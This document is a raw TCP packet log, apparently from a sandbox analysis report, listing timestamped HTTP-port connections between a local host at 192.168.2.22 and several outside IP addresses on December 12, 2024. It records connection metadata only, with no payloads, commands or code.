                                                                                                            Dec 12, 2024 10:20:23.028301954 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.029654026 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.029700994 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.029800892 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.029840946 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.031306028 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.031361103 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.031505108 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.031539917 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.032856941 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.032902002 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.044877052 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.044894934 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.044936895 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.045299053 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.045345068 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.045387030 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.045433044 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.046260118 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.046272039 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.046307087 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.092426062 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.092442036 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.092524052 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.093372107 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.093427896 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.093537092 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.093537092 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.095978975 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.096033096 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.098467112 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.098529100 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.098541975 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.098587036 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.101370096 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.101381063 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.101430893 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.104830027 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.104842901 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.104878902 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.107287884 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.107300043 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.107345104 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.109736919 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.109783888 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.109791994 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.109833956 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.113714933 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.113768101 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.113770962 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.113817930 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.114528894 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.114573002 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.114701986 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.114743948 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.116036892 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.116081953 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.116144896 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.116188049 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.117564917 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.117609024 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.117666960 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.117707014 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.119096041 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.119138956 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.119184971 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.119227886 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.120579958 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.120623112 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.120691061 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.120733023 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.122081041 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.122109890 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.122144938 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.122144938 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.122241020 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.122277975 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.123630047 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.123686075 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.123742104 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.123785019 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.125185013 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.125227928 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.125557899 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.125601053 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.126669884 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.126713037 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.126785994 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.126828909 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.128216982 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.128243923 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.128273964 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.128274918 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.131190062 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.131201982 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.131239891 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.131347895 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.131402016 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.132193089 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.132237911 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.133296013 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.133306026 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.133339882 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.134397030 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.134407043 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.134439945 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.136117935 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.136128902 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.136163950 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.138000011 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.138010979 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.138041019 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.138853073 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.138896942 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.138948917 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.138999939 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.140400887 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.140443087 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.140455008 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.140496969 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.141876936 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.141921997 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.141995907 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.142036915 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.143384933 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.143470049 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.143532038 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.143578053 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.144895077 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.144949913 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.145065069 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.145113945 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.146452904 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.146506071 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.146584988 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.146635056 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.148036003 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.148113012 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.148164034 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.148205996 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.149713039 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.149723053 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.149768114 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.150974989 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.151035070 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.151106119 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.151154041 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.152504921 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.152556896 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.152647972 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.152709961 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.154230118 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.154239893 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.154287100 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:23.155637980 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.155647993 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:20:23.155688047 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:20:40.044104099 CET4917080192.168.2.22188.114.97.6
                                                                                                            Dec 12, 2024 10:20:40.163887024 CET8049170188.114.97.6192.168.2.22
                                                                                                            Dec 12, 2024 10:20:41.230292082 CET8049170188.114.97.6192.168.2.22
                                                                                                            Dec 12, 2024 10:20:41.230309963 CET8049170188.114.97.6192.168.2.22
                                                                                                            Dec 12, 2024 10:20:41.230423927 CET4917080192.168.2.22188.114.97.6
                                                                                                            Dec 12, 2024 10:20:41.230854034 CET8049170188.114.97.6192.168.2.22
                                                                                                            Dec 12, 2024 10:20:41.230906010 CET4917080192.168.2.22188.114.97.6
                                                                                                            Dec 12, 2024 10:20:41.233593941 CET4917080192.168.2.22188.114.97.6
                                                                                                            Dec 12, 2024 10:20:41.353027105 CET8049170188.114.97.6192.168.2.22
                                                                                                            Dec 12, 2024 10:20:46.866836071 CET4917180192.168.2.2285.25.177.138
                                                                                                            Dec 12, 2024 10:20:46.986232042 CET804917185.25.177.138192.168.2.22
                                                                                                            Dec 12, 2024 10:20:46.986299038 CET4917180192.168.2.2285.25.177.138
                                                                                                            Dec 12, 2024 10:20:47.008343935 CET4917180192.168.2.2285.25.177.138
                                                                                                            Dec 12, 2024 10:20:47.127675056 CET804917185.25.177.138192.168.2.22
                                                                                                            Dec 12, 2024 10:20:47.127778053 CET4917180192.168.2.2285.25.177.138
                                                                                                            Dec 12, 2024 10:20:47.127857924 CET804917185.25.177.138192.168.2.22
                                                                                                            Dec 12, 2024 10:20:47.247265100 CET804917185.25.177.138192.168.2.22
                                                                                                            Dec 12, 2024 10:20:48.270581007 CET804917185.25.177.138192.168.2.22
                                                                                                            Dec 12, 2024 10:20:48.271064043 CET804917185.25.177.138192.168.2.22
                                                                                                            Dec 12, 2024 10:20:48.271142960 CET4917180192.168.2.2285.25.177.138
                                                                                                            Dec 12, 2024 10:20:48.519826889 CET4917180192.168.2.2285.25.177.138
                                                                                                            Dec 12, 2024 10:20:49.535603046 CET4917280192.168.2.2285.25.177.138
                                                                                                            Dec 12, 2024 10:20:49.654942036 CET804917285.25.177.138192.168.2.22
                                                                                                            Dec 12, 2024 10:20:49.655050039 CET4917280192.168.2.2285.25.177.138
                                                                                                            Dec 12, 2024 10:20:49.667020082 CET4917280192.168.2.2285.25.177.138
                                                                                                            Dec 12, 2024 10:20:49.786365032 CET804917285.25.177.138192.168.2.22
                                                                                                            Dec 12, 2024 10:20:50.939935923 CET804917285.25.177.138192.168.2.22
                                                                                                            Dec 12, 2024 10:20:50.940521955 CET804917285.25.177.138192.168.2.22
                                                                                                            Dec 12, 2024 10:20:50.940625906 CET4917280192.168.2.2285.25.177.138
                                                                                                            Dec 12, 2024 10:20:51.171163082 CET4917280192.168.2.2285.25.177.138
                                                                                                            Dec 12, 2024 10:20:52.187334061 CET4917380192.168.2.2285.25.177.138
                                                                                                            Dec 12, 2024 10:20:52.306797981 CET804917385.25.177.138192.168.2.22
                                                                                                            Dec 12, 2024 10:20:52.306967974 CET4917380192.168.2.2285.25.177.138
                                                                                                            Dec 12, 2024 10:20:52.320725918 CET4917380192.168.2.2285.25.177.138
                                                                                                            Dec 12, 2024 10:20:52.440505981 CET804917385.25.177.138192.168.2.22
                                                                                                            Dec 12, 2024 10:20:52.440634012 CET4917380192.168.2.2285.25.177.138
                                                                                                            Dec 12, 2024 10:20:52.440680027 CET804917385.25.177.138192.168.2.22
                                                                                                            Dec 12, 2024 10:20:52.560522079 CET804917385.25.177.138192.168.2.22
                                                                                                            Dec 12, 2024 10:20:52.560595989 CET804917385.25.177.138192.168.2.22
                                                                                                            Dec 12, 2024 10:20:53.691487074 CET804917385.25.177.138192.168.2.22
                                                                                                            Dec 12, 2024 10:20:53.692627907 CET804917385.25.177.138192.168.2.22
                                                                                                            Dec 12, 2024 10:20:53.692789078 CET4917380192.168.2.2285.25.177.138
                                                                                                            Dec 12, 2024 10:20:53.823295116 CET4917380192.168.2.2285.25.177.138
                                                                                                            Dec 12, 2024 10:20:54.842746019 CET4917480192.168.2.2285.25.177.138
                                                                                                            Dec 12, 2024 10:20:54.962826014 CET804917485.25.177.138192.168.2.22
                                                                                                            Dec 12, 2024 10:20:54.963037968 CET4917480192.168.2.2285.25.177.138
                                                                                                            Dec 12, 2024 10:20:54.975557089 CET4917480192.168.2.2285.25.177.138
                                                                                                            Dec 12, 2024 10:20:55.095410109 CET804917485.25.177.138192.168.2.22
                                                                                                            Dec 12, 2024 10:20:56.247915983 CET804917485.25.177.138192.168.2.22
                                                                                                            Dec 12, 2024 10:20:56.247939110 CET804917485.25.177.138192.168.2.22
                                                                                                            Dec 12, 2024 10:20:56.248122931 CET4917480192.168.2.2285.25.177.138
                                                                                                            Dec 12, 2024 10:20:56.251806974 CET4917480192.168.2.2285.25.177.138
                                                                                                            Dec 12, 2024 10:20:56.373316050 CET804917485.25.177.138192.168.2.22
                                                                                                            Dec 12, 2024 10:21:18.753393888 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:21:18.873327017 CET804916645.33.6.223192.168.2.22
                                                                                                            Dec 12, 2024 10:21:18.873373032 CET4916680192.168.2.2245.33.6.223
                                                                                                            Dec 12, 2024 10:21:29.051034927 CET4917580192.168.2.22173.236.199.97
                                                                                                            Dec 12, 2024 10:21:29.170362949 CET8049175173.236.199.97192.168.2.22
                                                                                                            Dec 12, 2024 10:21:29.175041914 CET4917580192.168.2.22173.236.199.97
                                                                                                            Dec 12, 2024 10:21:29.188191891 CET4917580192.168.2.22173.236.199.97
                                                                                                            Dec 12, 2024 10:21:29.307723999 CET8049175173.236.199.97192.168.2.22
                                                                                                            Dec 12, 2024 10:21:29.307734966 CET8049175173.236.199.97192.168.2.22
                                                                                                            Dec 12, 2024 10:21:29.308577061 CET4917580192.168.2.22173.236.199.97
                                                                                                            Dec 12, 2024 10:21:29.427992105 CET8049175173.236.199.97192.168.2.22
                                                                                                            Dec 12, 2024 10:21:30.290648937 CET8049175173.236.199.97192.168.2.22
                                                                                                            Dec 12, 2024 10:21:30.293157101 CET8049175173.236.199.97192.168.2.22
                                                                                                            Dec 12, 2024 10:21:30.293200970 CET4917580192.168.2.22173.236.199.97
                                                                                                            Dec 12, 2024 10:21:30.701668978 CET4917580192.168.2.22173.236.199.97
                                                                                                            Dec 12, 2024 10:21:31.718513012 CET4917680192.168.2.22173.236.199.97
                                                                                                            Dec 12, 2024 10:21:31.838159084 CET8049176173.236.199.97192.168.2.22
                                                                                                            Dec 12, 2024 10:21:31.838402033 CET4917680192.168.2.22173.236.199.97
                                                                                                            Dec 12, 2024 10:21:31.849853039 CET4917680192.168.2.22173.236.199.97
                                                                                                            Dec 12, 2024 10:21:31.969464064 CET8049176173.236.199.97192.168.2.22
                                                                                                            Dec 12, 2024 10:21:32.950170994 CET8049176173.236.199.97192.168.2.22
                                                                                                            Dec 12, 2024 10:21:32.950412035 CET8049176173.236.199.97192.168.2.22
                                                                                                            Dec 12, 2024 10:21:32.951376915 CET4917680192.168.2.22173.236.199.97
                                                                                                            Dec 12, 2024 10:21:33.353647947 CET4917680192.168.2.22173.236.199.97
                                                                                                            Dec 12, 2024 10:21:34.370204926 CET4917780192.168.2.22173.236.199.97
                                                                                                            Dec 12, 2024 10:21:34.490001917 CET8049177173.236.199.97192.168.2.22
                                                                                                            Dec 12, 2024 10:21:34.490080118 CET4917780192.168.2.22173.236.199.97
                                                                                                            Dec 12, 2024 10:21:34.502125978 CET4917780192.168.2.22173.236.199.97
                                                                                                            Dec 12, 2024 10:21:34.621572018 CET8049177173.236.199.97192.168.2.22
                                                                                                            Dec 12, 2024 10:21:34.621628046 CET4917780192.168.2.22173.236.199.97
                                                                                                            Dec 12, 2024 10:21:34.621634960 CET8049177173.236.199.97192.168.2.22
                                                                                                            Dec 12, 2024 10:21:34.741009951 CET8049177173.236.199.97192.168.2.22
                                                                                                            Dec 12, 2024 10:21:34.741044044 CET8049177173.236.199.97192.168.2.22
                                                                                                            Dec 12, 2024 10:21:35.595786095 CET8049177173.236.199.97192.168.2.22
                                                                                                            Dec 12, 2024 10:21:35.596194029 CET8049177173.236.199.97192.168.2.22
                                                                                                            Dec 12, 2024 10:21:35.603169918 CET4917780192.168.2.22173.236.199.97
                                                                                                            Dec 12, 2024 10:21:36.005842924 CET4917780192.168.2.22173.236.199.97
                                                                                                            Dec 12, 2024 10:21:37.023026943 CET4917880192.168.2.22173.236.199.97
                                                                                                            Dec 12, 2024 10:21:37.147178888 CET8049178173.236.199.97192.168.2.22
                                                                                                            Dec 12, 2024 10:21:37.147694111 CET4917880192.168.2.22173.236.199.97
                                                                                                            Dec 12, 2024 10:21:37.157578945 CET4917880192.168.2.22173.236.199.97
                                                                                                            Dec 12, 2024 10:21:37.279089928 CET8049178173.236.199.97192.168.2.22
                                                                                                            Dec 12, 2024 10:21:38.255367994 CET8049178173.236.199.97192.168.2.22
                                                                                                            Dec 12, 2024 10:21:38.255857944 CET8049178173.236.199.97192.168.2.22
                                                                                                            Dec 12, 2024 10:21:38.255907059 CET4917880192.168.2.22173.236.199.97
                                                                                                            Dec 12, 2024 10:21:38.259099007 CET4917880192.168.2.22173.236.199.97
                                                                                                            Dec 12, 2024 10:21:38.378603935 CET8049178173.236.199.97192.168.2.22
                                                                                                            Dec 12, 2024 10:21:43.635827065 CET4917980192.168.2.22203.161.42.73
                                                                                                            Dec 12, 2024 10:21:43.755587101 CET8049179203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:43.761392117 CET4917980192.168.2.22203.161.42.73
                                                                                                            Dec 12, 2024 10:21:43.769907951 CET4917980192.168.2.22203.161.42.73
                                                                                                            Dec 12, 2024 10:21:43.889596939 CET8049179203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:43.889637947 CET8049179203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:43.897783995 CET4917980192.168.2.22203.161.42.73
                                                                                                            Dec 12, 2024 10:21:44.017441988 CET8049179203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:44.996331930 CET8049179203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:44.996359110 CET8049179203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:44.996376991 CET8049179203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:44.996515036 CET8049179203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:44.996534109 CET8049179203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:44.996551991 CET8049179203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:44.996579885 CET4917980192.168.2.22203.161.42.73
                                                                                                            Dec 12, 2024 10:21:44.996654034 CET8049179203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:44.996654987 CET4917980192.168.2.22203.161.42.73
                                                                                                            Dec 12, 2024 10:21:44.996673107 CET8049179203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:44.996691942 CET8049179203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:44.996711016 CET8049179203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:44.996738911 CET4917980192.168.2.22203.161.42.73
                                                                                                            Dec 12, 2024 10:21:44.996886015 CET4917980192.168.2.22203.161.42.73
                                                                                                            Dec 12, 2024 10:21:45.115983009 CET8049179203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:45.116096973 CET8049179203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:45.119524956 CET4917980192.168.2.22203.161.42.73
                                                                                                            Dec 12, 2024 10:21:45.120357037 CET8049179203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:45.120541096 CET8049179203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:45.123224020 CET4917980192.168.2.22203.161.42.73
                                                                                                            Dec 12, 2024 10:21:45.188250065 CET8049179203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:45.188318968 CET8049179203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:45.190884113 CET8049179203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:45.190982103 CET4917980192.168.2.22203.161.42.73
                                                                                                            Dec 12, 2024 10:21:45.274745941 CET4917980192.168.2.22203.161.42.73
                                                                                                            Dec 12, 2024 10:21:46.289521933 CET4918080192.168.2.22203.161.42.73
                                                                                                            Dec 12, 2024 10:21:46.409106970 CET8049180203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:46.409173012 CET4918080192.168.2.22203.161.42.73
                                                                                                            Dec 12, 2024 10:21:46.426131964 CET4918080192.168.2.22203.161.42.73
                                                                                                            Dec 12, 2024 10:21:46.545551062 CET8049180203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:47.642015934 CET8049180203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:47.642050982 CET8049180203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:47.642087936 CET8049180203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:47.642283916 CET8049180203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:47.642306089 CET8049180203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:47.642318964 CET4918080192.168.2.22203.161.42.73
                                                                                                            Dec 12, 2024 10:21:47.642324924 CET8049180203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:47.642342091 CET8049180203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:47.642359972 CET8049180203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:47.642390966 CET4918080192.168.2.22203.161.42.73
                                                                                                            Dec 12, 2024 10:21:47.642565966 CET8049180203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:47.642585039 CET8049180203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:47.643045902 CET4918080192.168.2.22203.161.42.73
                                                                                                            Dec 12, 2024 10:21:47.763082981 CET8049180203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:47.763206005 CET8049180203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:47.763501883 CET4918080192.168.2.22203.161.42.73
                                                                                                            Dec 12, 2024 10:21:47.767148018 CET8049180203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:47.833959103 CET8049180203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:47.833992958 CET8049180203.161.42.73192.168.2.22
                                                                                                            Dec 12, 2024 10:21:47.834083080 CET4918080192.168.2.22203.161.42.73
                                                                                                            Dec 12, 2024 10:22:42.956924915 CET8049195217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:42.957237959 CET4919580192.168.2.22217.160.0.200
                                                                                                            Dec 12, 2024 10:22:43.076576948 CET8049195217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:44.106810093 CET8049195217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:44.106861115 CET8049195217.160.0.200192.168.2.22
                                                                                                            Dec 12, 2024 10:22:44.107064009 CET8049195217.160.0.200192.168.2.22
